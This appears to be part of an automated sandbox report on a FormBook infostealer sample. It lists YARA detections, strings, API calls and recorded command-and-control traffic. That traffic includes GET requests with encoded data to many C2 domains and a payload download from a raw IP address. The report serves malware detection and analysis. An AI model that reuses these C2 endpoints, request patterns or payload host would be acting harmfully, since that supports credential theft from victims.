Source: explorer.exe, 00000004.00000000.9902197549.000000000D1A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11264501949.000000000D1A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14578477014.000000000D1A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.queryF
Source: explorer.exe, 00000004.00000002.14579257959.000000000D30D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12111240915.000000000D30D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11270980029.000000000D30B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1721px.img
Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO6J5d.img
Source: explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBTUSNp.img
Source: MaMsKRmgXZ.exe, 00000002.00000001.9728969517.0000000000649000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: explorer.exe, 00000004.00000003.12109712536.00000000096B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14570643138.00000000096B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9897491783.00000000096B4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.comQJ
Source: explorer.exe, 00000004.00000003.11262903343.000000000D0C3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11268545969.000000000D0C3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D0C3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14577565599.000000000D0C3000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.come
Source: explorer.exe, 00000004.00000000.9902197549.000000000D1A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11264501949.000000000D1A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14578477014.000000000D1A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://th.bing.
Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-US&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-US&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000004.00000000.9902197549.000000000CE47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14576881586.000000000CE47000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/tm
Source: explorer.exe, 00000004.00000000.9902197549.000000000CE47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14576881586.000000000CE47000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000004.00000002.14579257959.000000000D30D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12111240915.000000000D30D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11270980029.000000000D30B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comt.
Source: explorer.exe, 00000004.00000002.14584974938.00000000142DF000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.ktrandnews.com/ro12/?3fY=-ZkX&pR-=gjAFVEeeiH9OAOPDCKjXPtqfGvq//Fy/v54m7kKmQemvHE2y
Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/markets/europe-gives-mark-zuckerberg-24-hours-to-respond-about-israe
Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/retirement/is-it-normal-to-retire-at-66-how-the-us-compares-to-10-ot
Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/house-gop-picks-steve-scalise-as-speaker-nominee-but-unclear
Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/sen-mitt-romney-urged-democratic-senators-to-challenge-biden
Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/a-solar-eclipse-will-cross-san-diego-this-weekend-here-s-h
Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/ancient-maya-kings-may-have-already-told-us-how-to-solve-o
Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/initial-us-intelligence-suggests-iran-was-surprised-by-the-hama
Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/travel/news/rockets-fly-planes-grounded-americans-struggle-to-escape-war-i
Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed

Source: unknown

DNS traffic detected: queries for: www.los3.online

Source: C:\Windows\explorer.exe

Code function: 4_2_0A72FF82 getaddrinfo,setsockopt,recv,

4_2_0A72FF82

Source: global traffic	HTTP traffic detected: GET /pcd/wAYOlXAIjrMljL79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: 103.72.68.128Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ro12/?pR-=GwGtW18azFWuCI/cWsMSGkvtLVgXrxrAejaoI1gQoBI/O/ZzRnUmOmWdpT96riJEH3vd&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.start399.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ro12/?pR-=dJqi3gPkjgABca74pxnHJ2flNeCuOiIkF0IIcqv13LRvEaAIYFadFLyq9bv/k+1Q0EDq&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.niaeoer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ro12/?pR-=uQgh28/mwUTAreWLWMvWctCpaYYKSPk/RTU2hG/2GkXh2eCF81faGnz4QbuRWtjyYx7X&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.qualityquickprints.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ro12/?pR-=YIi7nDQw6o4IM6Y7GVEqMnWSon2sCGETt9fQ5s5Vu4Y8lCbsapzjTWOCPxSAe4pqXmXo&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.55dy5s.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ro12/?pR-=YvLwEHT7dF3wqOWcBoJhBcwDYJ3uuNfwUzugM5jE2WtwH9yjz4WpnbfVNhN3mQxE4RMu&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.holzleisten24.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ro12/?pR-=0LOFVeHqsrMeo4L+dmJBR/0B/c0sqVoEg1WVw/8t1mjD3B4IGyZiGj+5uErL3J0wPr7A&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.xlrj.asiaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ro12/?pR-=gzgOk9L9AfWHfN0tCkhRIi8dk8p3PFyiDnwZelvp2AG1WsshoUlVSypZKzCbkCaQBejH&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.fathomtackle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ro12/?pR-=4oHDpgyPUiJGP23m0SdAgh/yfEH8JJ8nkAUqpp/b29PXB/3TZ/gO5/kpv5F7QImaAVTW&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.digitalserviceact.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ro12/?pR-=hMzxxbkXjK5UhHFUVKKzsXjiG5SdjoCmZm0mRTZiy05C1nCrhTC2iqR8bXRfdiWJf26x&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.ddbetting.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ro12/?pR-=rtUgTuNL7uL+LGGSpkT0QUDqa6bNuU9c/oVzs0vN/XeiV6RFY6H23yk7imnqF7CC5MmR&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.ps212naming.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ro12/?pR-=uAil5XdBoZ+2CkbxeHQt0E2a6PqX6RKuOQ+ejqYxtKGY7TwYTqnnbJE3/J+NrU/b1JZc&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.pwpholdings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ro12/?3fY=-ZkX&pR-=YIi7nDQw6o4IM6Y7GVEqMnWSon2sCGETt9fQ5s5Vu4Y8lCbsapzjTWOCPxSAe4pqXmXo HTTP/1.1Host: www.55dy5s.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ro12/?pR-=TUQv1xq+sor4G/cf0NME9zAsbR56SjOR/AikpQZ6liEkkl3DXF9T0sERNIDZexcZDDH8&3fY=-ZkX HTTP/1.1Host: www.senior-living-91799.bondConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ro12/?3fY=-ZkX&pR-=LGYu0+ofLQhP7724nJ/BQ1gFrbGvfVPqmQuS2LiwheVAxFjzT3VG9Q3bfEwRvtUKPFG/ HTTP/1.1Host: www.riderarea.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ro12/?3fY=-ZkX&pR-=gjAFVEeeiH9OAOPDCKjXPtqfGvq//Fy/v54m7kKmQemvHE2y+/COmLQxuu8r1C37UwGV HTTP/1.1Host: www.ktrandnews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe

Code function: 0_2_0040523F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040523F

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: MaMsKRmgXZ.exe PID: 6720, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: MaMsKRmgXZ.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: MaMsKRmgXZ.exe PID: 6720, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe

Code function: 0_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403235

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 0_2_00406666	0_2_00406666
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 0_2_6EC01A98	0_2_6EC01A98
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341F0445	2_2_341F0445
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3425D480	2_2_3425D480
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342BA526	2_2_342BA526
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342AF5C9	2_2_342AF5C9
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342A75C6	2_2_342A75C6
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3428D62C	2_2_3428D62C
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3420C600	2_2_3420C600
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34214670	2_2_34214670
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3429D646	2_2_3429D646
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341F0680	2_2_341F0680
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342636EC	2_2_342636EC
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342AF6F6	2_2_342AF6F6
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342AA6C0	2_2_342AA6C0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341EC6E0	2_2_341EC6E0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342A6757	2_2_342A6757
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341F2760	2_2_341F2760
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341FA760	2_2_341FA760
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3429E076	2_2_3429E076
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3422508C	2_2_3422508C
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341E00A0	2_2_341E00A0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341FB0D0	2_2_341FB0D0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342A70F1	2_2_342A70F1
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341DF113	2_2_341DF113
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3428D130	2_2_3428D130
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342B010E	2_2_342B010E
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3423717A	2_2_3423717A
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3420B1E0	2_2_3420B1E0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341F51C0	2_2_341F51C0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342A124C	2_2_342A124C
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341DD2EC	2_2_341DD2EC
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341FE310	2_2_341FE310
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342AF330	2_2_342AF330
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341E1380	2_2_341E1380
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3426EC20	2_2_3426EC20
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341E0C12	2_2_341E0C12
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341FAC20	2_2_341FAC20
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342A6C69	2_2_342A6C69
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342AEC60	2_2_342AEC60
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3429EC4C	2_2_3429EC4C
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341F3C60	2_2_341F3C60
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34289C98	2_2_34289C98
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3420FCE0	2_2_3420FCE0
